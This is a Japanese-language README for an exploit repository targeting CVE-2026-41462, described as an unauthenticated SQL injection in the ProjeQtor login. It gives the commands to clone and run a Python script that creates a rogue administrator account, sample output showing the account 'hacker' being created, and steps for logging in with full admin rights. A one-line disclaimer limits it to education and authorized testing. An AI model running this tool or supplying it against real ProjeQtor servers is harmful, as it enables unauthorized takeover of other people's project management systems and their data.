
CVE-2026-41462
ProjeQtor ≤ 12.4.3 における重大な未認証SQLインジェクション
CVE-2026-41462 は、ProjeQtor プロジェクト管理ツールのログイン機能における重大な未認証SQLインジェクションの脆弱性です。
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
エクスプロイトが成功すると、以下のような出力が表示されます:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
ブラウザを開いて、次のURLにアクセスします:
http://target.com/login.php
スクリプトの出力に表示された認証情報を使用してログインします。
成功すると、完全な管理者権限を持つ ProjeQtor 管理ダッシュボード にアクセスできます。
成功の指標:
| File | Description |
|---|---|
CVE-2026-41462.py | メインのエクスプロイトスクリプト |
CVE-2026-41462.yaml | Nuclei 検出テンプレート |
README.md | このドキュメント |
リポジトリをクローンします:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
エクスプロイトを実行します:
python3 CVE-2026-41462.py -u http://target.com --create-admin
新しく作成された管理者アカウントでログインします。
このツールは教育目的および許可を得たペネトレーションテスト専用です。無断使用は違法です。